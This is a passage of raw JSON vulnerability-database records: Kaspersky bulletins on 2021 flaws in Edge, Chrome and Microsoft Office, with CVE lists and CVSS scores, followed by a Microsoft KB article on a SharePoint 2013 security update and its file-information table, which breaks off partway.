Malicious users can exploit these vulnerabilities to execute arbitrary code, cause denial of service.\n\n### *Affected products*:\nMicrosoft Edge (Chromium-based)\n\n### *Solution*:\nInstall necessary updates from the Settings and more menu, that are listed in your About Microsoft Edge page (Microsoft Edge About page usually can be accessed from the Help and feedback option) \n[Microsoft Edge update settings](<https://support.microsoft.com/en-us/topic/microsoft-edge-update-settings-af8aaca2-1b69-4870-94fe-18822dbb7ef1>)\n\n### *Original advisories*:\n[CVE-2021-21225](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-21225>) \n[CVE-2021-21222](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-21222>) \n[CVE-2021-21223](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-21223>) \n[CVE-2021-21224](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-21224>) \n[CVE-2021-21226](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-21226>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Edge](<https://threats.kaspersky.com/en/product/Microsoft-Edge/>)\n\n### *CVE-IDS*:\n[CVE-2021-21226](<https://vulners.com/cve/CVE-2021-21226>)6.8High \n[CVE-2021-21223](<https://vulners.com/cve/CVE-2021-21223>)6.8High \n[CVE-2021-21225](<https://vulners.com/cve/CVE-2021-21225>)6.8High \n[CVE-2021-21222](<https://vulners.com/cve/CVE-2021-21222>)4.3Warning \n[CVE-2021-21224](<https://vulners.com/cve/CVE-2021-21224>)6.8High\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, 
"published": "2021-04-22T00:00:00", "type": "kaspersky", "title": "KLA12153 Multiple vulnerabilities in Microsoft Browser", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226"], "modified": "2023-03-28T00:00:00", "id": "KLA12153", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12153/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-08T15:47:04", "description": "### *Detect date*:\n04/20/2021\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Google Chrome. 
Malicious users can exploit these vulnerabilities to execute arbitrary code.\n\n### *Affected products*:\nGoogle Chrome earlier than 90.0.4430.85\n\n### *Solution*:\nUpdate to the latest version \n[Download Google Chrome](<https://www.google.com/chrome/>)\n\n### *Original advisories*:\n[Stable Channel Update for Desktop](<https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop_20.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2021-21226](<https://vulners.com/cve/CVE-2021-21226>)6.8High \n[CVE-2021-21223](<https://vulners.com/cve/CVE-2021-21223>)6.8High \n[CVE-2021-21225](<https://vulners.com/cve/CVE-2021-21225>)6.8High \n[CVE-2021-21222](<https://vulners.com/cve/CVE-2021-21222>)4.3Warning \n[CVE-2021-21224](<https://vulners.com/cve/CVE-2021-21224>)6.8High", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-04-20T00:00:00", "type": "kaspersky", "title": "KLA12147 Multiple vulnerabiltiies in Google Chrome", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226"], "modified": "2021-05-27T00:00:00", "id": "KLA12147", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12147/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-08T15:46:14", "description": "### *Detect date*:\n06/08/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Office. Malicious users can exploit these vulnerabilities to execute arbitrary code, spoof user interface, obtain sensitive information.\n\n### *Affected products*:\nMicrosoft SharePoint Enterprise Server 2016 \nMicrosoft Office Web Apps Server 2013 Service Pack 1 \nMicrosoft Office 2013 Service Pack 1 (32-bit editions) \nMicrosoft Excel 2013 Service Pack 1 (32-bit editions) \nMicrosoft Office 2016 (64-bit edition) \nMicrosoft Office 2016 (32-bit edition) \nMicrosoft Outlook 2013 Service Pack 1 (64-bit editions) \nMicrosoft Outlook 2016 (64-bit edition) \nMicrosoft Outlook 2013 Service Pack 1 (32-bit editions) \nMicrosoft Office 2013 RT Service Pack 1 \nMicrosoft Excel 2013 Service Pack 1 (64-bit editions) \nMicrosoft Office 2019 for 32-bit editions \nMicrosoft Excel 2016 (64-bit edition) \nMicrosoft SharePoint Foundation 2013 Service Pack 1 \nMicrosoft Office 2019 for Mac \nMicrosoft Excel 2013 RT Service Pack 1 \nMicrosoft Outlook 2016 (32-bit edition) \nMicrosoft Office 2019 for 64-bit editions \nMicrosoft 365 Apps for Enterprise for 32-bit Systems \nMicrosoft Excel 2016 (32-bit edition) \nMicrosoft SharePoint Enterprise Server 2013 Service Pack 1 \nMicrosoft SharePoint Server 2019 \nMicrosoft Office 2013 Service Pack 1 (64-bit editions) \nMicrosoft Outlook 2013 RT Service Pack 1 \nMicrosoft 365 Apps for Enterprise for 64-bit Systems \nOffice Online Server\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the 
Control Panel)\n\n### *Original advisories*:\n[CVE-2021-31940](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31940>) \n[CVE-2021-31949](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31949>) \n[CVE-2021-26420](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-26420>) \n[CVE-2021-31948](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31948>) \n[CVE-2021-31966](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31966>) \n[CVE-2021-31939](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31939>) \n[CVE-2021-31965](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31965>) \n[CVE-2021-31941](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31941>) \n[CVE-2021-31963](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31963>) \n[CVE-2021-31964](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31964>) \n[CVE-2021-31950](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31950>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Office](<https://threats.kaspersky.com/en/product/Microsoft-Office/>)\n\n### *CVE-IDS*:\n[CVE-2021-31940](<https://vulners.com/cve/CVE-2021-31940>)6.8High \n[CVE-2021-31949](<https://vulners.com/cve/CVE-2021-31949>)6.8High \n[CVE-2021-26420](<https://vulners.com/cve/CVE-2021-26420>)6.5High \n[CVE-2021-31948](<https://vulners.com/cve/CVE-2021-31948>)5.5High \n[CVE-2021-31966](<https://vulners.com/cve/CVE-2021-31966>)6.5High \n[CVE-2021-31939](<https://vulners.com/cve/CVE-2021-31939>)6.8High \n[CVE-2021-31965](<https://vulners.com/cve/CVE-2021-31965>)4.0Warning \n[CVE-2021-31941](<https://vulners.com/cve/CVE-2021-31941>)6.8High \n[CVE-2021-31963](<https://vulners.com/cve/CVE-2021-31963>)6.5High \n[CVE-2021-31964](<https://vulners.com/cve/CVE-2021-31964>)5.5High 
\n[CVE-2021-31950](<https://vulners.com/cve/CVE-2021-31950>)5.5High\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[5001963](<http://support.microsoft.com/kb/5001963>) \n[5001946](<http://support.microsoft.com/kb/5001946>) \n[5001944](<http://support.microsoft.com/kb/5001944>) \n[5001955](<http://support.microsoft.com/kb/5001955>) \n[5001953](<http://support.microsoft.com/kb/5001953>) \n[5001943](<http://support.microsoft.com/kb/5001943>) \n[5001956](<http://support.microsoft.com/kb/5001956>) \n[5001939](<http://support.microsoft.com/kb/5001939>) \n[5001934](<http://support.microsoft.com/kb/5001934>) \n[5001954](<http://support.microsoft.com/kb/5001954>) \n[5001945](<http://support.microsoft.com/kb/5001945>) \n[5001947](<http://support.microsoft.com/kb/5001947>) \n[5001962](<http://support.microsoft.com/kb/5001962>) \n[4011698](<http://support.microsoft.com/kb/4011698>) \n[5001950](<http://support.microsoft.com/kb/5001950>) \n[5001922](<http://support.microsoft.com/kb/5001922>) \n[5001942](<http://support.microsoft.com/kb/5001942>) \n[5001951](<http://support.microsoft.com/kb/5001951>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "kaspersky", "title": "KLA12201 Multiple vulnerabilities in Microsoft Office", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, 
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26420", "CVE-2021-31939", "CVE-2021-31940", "CVE-2021-31941", "CVE-2021-31948", "CVE-2021-31949", "CVE-2021-31950", "CVE-2021-31963", "CVE-2021-31964", "CVE-2021-31965", "CVE-2021-31966"], "modified": "2021-06-22T00:00:00", "id": "KLA12201", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12201/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mskb": [{"lastseen": "2023-01-13T10:19:44", "description": "None\n## Summary\n\nThis security update resolves a Microsoft SharePoint Server remote code execution vulnerability. To learn more about the vulnerability, see [Microsoft Common Vulnerabilities and Exposures CVE-2021-31963](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31963>).\n\n**Note: **To apply this security update, you must have the release version of [Service Pack 1 for Microsoft SharePoint Server 2013](<http://support.microsoft.com/kb/2880552>) installed on the computer.\n\n## Known issues in this update\n\nWhen third-party assemblies try to access some sensitive properties, user code might be blocked. When this issue occurs, \u201c8gaol\u201d event entries are logged in SharePoint Unified Logging System (ULS) logs. For example, you may find the following entry in ULS logs: \n \n**8gaol Unable to access this sensitive property : <sensitive property name> from outer assembly.**To fix this issue, install KB5002013 and follow the guidance in KB5004581 to enable trusted third-party assemblies.\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. 
For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB4011698>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * [Download security update 4011698 for the 64-bit version of SharePoint Enterprise Server 2013](<http://www.microsoft.com/download/details.aspx?familyid=a385fbc2-ca6c-4abf-affd-92e6fb46688b>)\n\n## More information\n\n### Security update deployment information\n\nFor deployment information about this update, see Security update deployment information: June 8, 2021.\n\n### Security update replacement information\n\nThis security update replaces previously released security update [3203397](<http://support.microsoft.com/kb/3203397>).\n\n### File hash information\n\nFile name| SHA256 hash \n---|--- \nifsloc2013-kb4011698-fullfile-x64-glb.exe| B12C537E832EC6D9A0B81A8643D85F4A962BE8C3A272E041C7F6FF4323F5C21A \n \n### File information\n\nThe English (United States) version of this software update installs files that have the attributes that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight saving time (DST) bias. 
Additionally, the dates and times may change when you perform certain operations on the files.\n\n#### For all supported x64-based versions of SharePoint Enterprise Server 2013\n\nFile identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \nifsadminpages.resx.1025| ipfsadminpages.ar-sa.resx| | 35374| 12-May-21| 12:39 \nifsmain.css.1025| ifsmain.css| | 9631| 12-May-21| 12:39 \nintlcorestrings.js.1025| intlcorestrings.js| | 24283| 12-May-21| 12:39 \nipfscore.resx.1025| ipfscore.ar-sa.resx| | 11789| 12-May-21| 12:39 \nipfs.resx.1025| ipfs.ar-sa.resx| | 11724| 12-May-21| 12:39 \nifsintl.dll.1025| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 236664| 12-May-21| 12:39 \nrepres.dll_1025| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4442.1000| 12944| 12-May-21| 12:39 \nifsadminpages.resx.1068| ipfsadminpages.az-latn-az.resx| | 32280| 12-May-21| 12:39 \nifsmain.css.1068| ifsmain.css| | 9166| 12-May-21| 12:39 \nintlcorestrings.js.1068| intlcorestrings.js| | 20967| 12-May-21| 12:39 \nipfscore.resx.1068| ipfscore.az-latn-az.resx| | 11188| 12-May-21| 12:39 \nipfs.resx.1068| ipfs.az-latn-az.resx| | 11214| 12-May-21| 12:39 \nifsintl.dll.1068| microsoft.office.infopath.server.intl.resources.dll| 15.0.4569.1501| 209584| 12-May-21| 12:39 \nrepres.dll_1068| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4569.1501| 12976| 12-May-21| 12:39 \nifsadminpages.resx.1026| ipfsadminpages.bg-bg.resx| | 39352| 12-May-21| 12:39 \nifsmain.css.1026| ifsmain.css| | 9200| 12-May-21| 12:39 \nintlcorestrings.js.1026| intlcorestrings.js| | 27949| 12-May-21| 12:39 \nipfscore.resx.1026| ipfscore.bg-bg.resx| | 13030| 12-May-21| 12:39 \nipfs.resx.1026| ipfs.bg-bg.resx| | 12994| 12-May-21| 12:39 \nifsintl.dll.1026| microsoft.office.infopath.server.intl.resources.dll| 15.0.4454.1000| 271440| 12-May-21| 12:39 \nrepres.dll_1026| 
microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12944| 12-May-21| 12:39 \nifsadminpages.resx.5146| ipfsadminpages.bs-latn-ba.resx| | 31859| 12-May-21| 12:39 \nifsmain.css.5146| ifsmain.css| | 9158| 12-May-21| 12:39 \nintlcorestrings.js.5146| intlcorestrings.js| | 20158| 12-May-21| 12:39 \nipfscore.resx.5146| ipfscore.bs-latn-ba.resx| | 11043| 12-May-21| 12:39 \nipfs.resx.5146| ipfs.bs-latn-ba.resx| | 10797| 12-May-21| 12:39 \nifsintl.dll.5146| microsoft.office.infopath.server.intl.resources.dll| 15.0.4569.1501| 196784| 12-May-21| 12:39 \nrepres.dll_5146| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4569.1501| 12976| 12-May-21| 12:39 \nifsadminpages.resx.1027| ipfsadminpages.ca-es.resx| | 32565| 12-May-21| 12:39 \nifsmain.css.1027| ifsmain.css| | 9146| 12-May-21| 12:39 \nintlcorestrings.js.1027| intlcorestrings.js| | 20653| 12-May-21| 12:39 \nipfscore.resx.1027| ipfscore.ca-es.resx| | 11524| 12-May-21| 12:39 \nipfs.resx.1027| ipfs.ca-es.resx| | 11230| 12-May-21| 12:39 \nifsintl.dll.1027| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 208504| 12-May-21| 12:39 \nrepres.dll_1027| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12920| 12-May-21| 12:39 \nifsadminpages.resx.1029| ipfsadminpages.cs-cz.resx| | 32303| 12-May-21| 12:39 \nifsmain.css.1029| ifsmain.css| | 9146| 12-May-21| 12:39 \nintlcorestrings.js.1029| intlcorestrings.js| | 20258| 12-May-21| 12:39 \nipfscore.resx.1029| ipfscore.cs-cz.resx| | 11202| 12-May-21| 12:39 \nipfs.resx.1029| ipfs.cs-cz.resx| | 11081| 12-May-21| 12:39 \nifsintl.dll.1029| microsoft.office.infopath.server.intl.resources.dll| 15.0.4454.1000| 203864| 12-May-21| 12:39 \nrepres.dll_1029| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12920| 12-May-21| 12:39 \nifsadminpages.resx.1106| ipfsadminpages.cy-gb.resx| | 31118| 12-May-21| 12:39 \nifsmain.css.1106| ifsmain.css| | 9158| 
12-May-21| 12:39 \nintlcorestrings.js.1106| intlcorestrings.js| | 19938| 12-May-21| 12:39 \nipfscore.resx.1106| ipfscore.cy-gb.resx| | 10936| 12-May-21| 12:39 \nipfs.resx.1106| ipfs.cy-gb.resx| | 10829| 12-May-21| 12:39 \nifsintl.dll.1106| microsoft.office.infopath.server.intl.resources.dll| 15.0.4569.1501| 200880| 12-May-21| 12:39 \nrepres.dll_1106| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4569.1501| 12976| 12-May-21| 12:39 \nifsadminpages.resx.1030| ipfsadminpages.da-dk.resx| | 30825| 12-May-21| 12:39 \nifsmain.css.1030| ifsmain.css| | 9146| 12-May-21| 12:39 \nintlcorestrings.js.1030| intlcorestrings.js| | 19687| 12-May-21| 12:39 \nipfscore.resx.1030| ipfscore.da-dk.resx| | 10863| 12-May-21| 12:39 \nipfs.resx.1030| ipfs.da-dk.resx| | 10734| 12-May-21| 12:39 \nifsintl.dll.1030| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 200312| 12-May-21| 12:39 \nrepres.dll_1030| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12920| 12-May-21| 12:39 \nifsadminpages.resx.1031| ipfsadminpages.de-de.resx| | 31751| 12-May-21| 12:39 \nifsmain.css.1031| ifsmain.css| | 9146| 12-May-21| 12:39 \nintlcorestrings.js.1031| intlcorestrings.js| | 21239| 12-May-21| 12:39 \nipfscore.resx.1031| ipfscore.de-de.resx| | 11069| 12-May-21| 12:39 \nipfs.resx.1031| ipfs.de-de.resx| | 10997| 12-May-21| 12:39 \nifsintl.dll.1031| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 213624| 12-May-21| 12:39 \nrepres.dll_1031| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4442.1000| 12920| 12-May-21| 12:39 \nifsadminpages.resx.1032| ipfsadminpages.el-gr.resx| | 41816| 12-May-21| 12:39 \nifsmain.css.1032| ifsmain.css| | 9146| 12-May-21| 12:39 \nintlcorestrings.js.1032| intlcorestrings.js| | 30737| 12-May-21| 12:39 \nipfscore.resx.1032| ipfscore.el-gr.resx| | 13552| 12-May-21| 12:39 \nipfs.resx.1032| ipfs.el-gr.resx| | 13236| 12-May-21| 12:39 \nifsintl.dll.1032| 
microsoft.office.infopath.server.intl.resources.dll| 15.0.4420.1017| 301680| 12-May-21| 12:39 \nrepres.dll_1032| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12920| 12-May-21| 12:39 \nifsadminpages.resx.3082| ipfsadminpages.es-es.resx| | 32357| 12-May-21| 12:39 \nifsmain.css.3082| ifsmain.css| | 9146| 12-May-21| 12:39 \nintlcorestrings.js.3082| intlcorestrings.js| | 20483| 12-May-21| 12:39 \nipfscore.resx.3082| ipfscore.es-es.resx| | 11331| 12-May-21| 12:39 \nipfs.resx.3082| ipfs.es-es.resx| | 11005| 12-May-21| 12:39 \nifsintl.dll.3082| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 207480| 12-May-21| 12:39 \nrepres.dll_3082| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4442.1000| 12920| 12-May-21| 12:39 \nifsadminpages.resx.1061| ipfsadminpages.et-ee.resx| | 30597| 12-May-21| 12:39 \nifsmain.css.1061| ifsmain.css| | 9146| 12-May-21| 12:39 \nintlcorestrings.js.1061| intlcorestrings.js| | 19288| 12-May-21| 12:39 \nipfscore.resx.1061| ipfscore.et-ee.resx| | 10775| 12-May-21| 12:39 \nipfs.resx.1061| ipfs.et-ee.resx| | 10702| 12-May-21| 12:39 \nifsintl.dll.1061| microsoft.office.infopath.server.intl.resources.dll| 15.0.4460.1000| 187488| 12-May-21| 12:39 \nrepres.dll_1061| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12920| 12-May-21| 12:39 \nifsadminpages.resx.1069| ipfsadminpages.eu-es.resx| | 31518| 12-May-21| 12:39 \nifsmain.css.1069| ifsmain.css| | 9146| 12-May-21| 12:39 \nintlcorestrings.js.1069| intlcorestrings.js| | 19863| 12-May-21| 12:39 \nipfscore.resx.1069| ipfscore.eu-es.resx| | 11104| 12-May-21| 12:39 \nipfs.resx.1069| ipfs.eu-es.resx| | 10967| 12-May-21| 12:39 \nifsintl.dll.1069| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 200312| 12-May-21| 12:39 \nrepres.dll_1069| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12936| 12-May-21| 12:39 \nifsadminpages.resx.1035| 
ipfsadminpages.fi-fi.resx| | 31414| 12-May-21| 12:39 \nifsmain.css.1035| ifsmain.css| | 9200| 12-May-21| 12:39 \nintlcorestrings.js.1035| intlcorestrings.js| | 20382| 12-May-21| 12:39 \nipfscore.resx.1035| ipfscore.fi-fi.resx| | 10952| 12-May-21| 12:39 \nipfs.resx.1035| ipfs.fi-fi.resx| | 11028| 12-May-21| 12:39 \nifsintl.dll.1035| microsoft.office.infopath.server.intl.resources.dll| 15.0.4420.1017| 199800| 12-May-21| 12:39 \nrepres.dll_1035| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12944| 12-May-21| 12:39 \nifsadminpages.resx.1036| ipfsadminpages.fr-fr.resx| | 32806| 12-May-21| 12:39 \nifsmain.css.1036| ifsmain.css| | 9146| 12-May-21| 12:39 \nintlcorestrings.js.1036| intlcorestrings.js| | 20746| 12-May-21| 12:39 \nipfscore.resx.1036| ipfscore.fr-fr.resx| | 11334| 12-May-21| 12:39 \nipfs.resx.1036| ipfs.fr-fr.resx| | 11205| 12-May-21| 12:39 \nifsintl.dll.1036| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 214648| 12-May-21| 12:39 \nrepres.dll_1036| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4442.1000| 12920| 12-May-21| 12:39 \nifsadminpages.resx.2108| ipfsadminpages.ga-ie.resx| | 32313| 12-May-21| 12:39 \nifsmain.css.2108| ifsmain.css| | 9158| 12-May-21| 12:39 \nintlcorestrings.js.2108| intlcorestrings.js| | 21674| 12-May-21| 12:39 \nipfscore.resx.2108| ipfscore.ga-ie.resx| | 11278| 12-May-21| 12:39 \nipfs.resx.2108| ipfs.ga-ie.resx| | 11147| 12-May-21| 12:39 \nifsintl.dll.2108| microsoft.office.infopath.server.intl.resources.dll| 15.0.4569.1501| 211632| 12-May-21| 12:39 \nrepres.dll_2108| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4569.1501| 12976| 12-May-21| 12:39 \nifsadminpages.resx.1110| ipfsadminpages.gl-es.resx| | 31864| 12-May-21| 12:39 \nifsmain.css.1110| ifsmain.css| | 9200| 12-May-21| 12:39 \nintlcorestrings.js.1110| intlcorestrings.js| | 19922| 12-May-21| 12:39 \nipfscore.resx.1110| ipfscore.gl-es.resx| | 11242| 12-May-21| 
12:39 \nipfs.resx.1110| ipfs.gl-es.resx| | 10994| 12-May-21| 12:39 \nifsintl.dll.1110| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 203384| 12-May-21| 12:39 \nrepres.dll_1110| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12944| 12-May-21| 12:39 \nifsadminpages.resx.1037| ipfsadminpages.he-il.resx| | 33782| 12-May-21| 12:39 \nifsmain.css.1037| ifsmain.css| | 9371| 12-May-21| 12:39 \nintlcorestrings.js.1037| intlcorestrings.js| | 22910| 12-May-21| 12:39 \nipfscore.resx.1037| ipfscore.he-il.resx| | 11561| 12-May-21| 12:39 \nipfs.resx.1037| ipfs.he-il.resx| | 11537| 12-May-21| 12:39 \nifsintl.dll.1037| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 221816| 12-May-21| 12:39 \nrepres.dll_1037| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4442.1000| 12920| 12-May-21| 12:39 \nifsadminpages.resx.1081| ipfsadminpages.hi-in.resx| | 43487| 12-May-21| 12:39 \nifsmain.css.1081| ifsmain.css| | 9003| 12-May-21| 12:39 \nintlcorestrings.js.1081| intlcorestrings.js| | 33551| 12-May-21| 12:39 \nipfscore.resx.1081| ipfscore.hi-in.resx| | 13970| 12-May-21| 12:39 \nipfs.resx.1081| ipfs.hi-in.resx| | 14513| 12-May-21| 12:39 \nifsintl.dll.1081| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 318608| 12-May-21| 12:39 \nrepres.dll_1081| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12944| 12-May-21| 12:39 \nifsadminpages.resx.1050| ipfsadminpages.hr-hr.resx| | 31720| 12-May-21| 12:40 \nifsmain.css.1050| ifsmain.css| | 9146| 12-May-21| 12:40 \nintlcorestrings.js.1050| intlcorestrings.js| | 19881| 12-May-21| 12:40 \nipfscore.resx.1050| ipfscore.hr-hr.resx| | 11113| 12-May-21| 12:40 \nipfs.resx.1050| ipfs.hr-hr.resx| | 10880| 12-May-21| 12:40 \nifsintl.dll.1050| microsoft.office.infopath.server.intl.resources.dll| 15.0.4466.1000| 197712| 12-May-21| 12:40 \nrepres.dll_1050| 
microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12920| 12-May-21| 12:40 \nifsadminpages.resx.1038| ipfsadminpages.hu-hu.resx| | 32257| 12-May-21| 12:40 \nifsmain.css.1038| ifsmain.css| | 9146| 12-May-21| 12:40 \nintlcorestrings.js.1038| intlcorestrings.js| | 20837| 12-May-21| 12:40 \nipfscore.resx.1038| ipfscore.hu-hu.resx| | 11196| 12-May-21| 12:40 \nipfs.resx.1038| ipfs.hu-hu.resx| | 11142| 12-May-21| 12:40 \nifsintl.dll.1038| microsoft.office.infopath.server.intl.resources.dll| 15.0.4442.1000| 208504| 12-May-21| 12:40 \nrepres.dll_1038| microsoft.office.infopath.server.repairutilities.intl.resources.dll| 15.0.4420.1017| 12920| 12-May-21| 12:40 \nifsadminpages.resx.1057| ipfsadminpages.id-id.resx| | 30440| 12-May-21| 12:40 \nifsmain.css.1057| ifsmain.css| | 9146| 12-May-21| 12:40 \nintlcorestrings.js.1057| intlcorestrings.js| | 19606| 12-May-21| 12:40 \nipfscore.resx.1057| ipfscore.id-id.resx| | 10817| 12-May-21| 12:40 \nipfs.resx.1057| ipfs.id-id.resx| | 10752| 12-May-21| 12:40 \nifsintl.dll.1057| microsoft.office.infopath.server.intl.resources.dll| 15.0.4481.1000| 194128| 12-May-21| 12:40 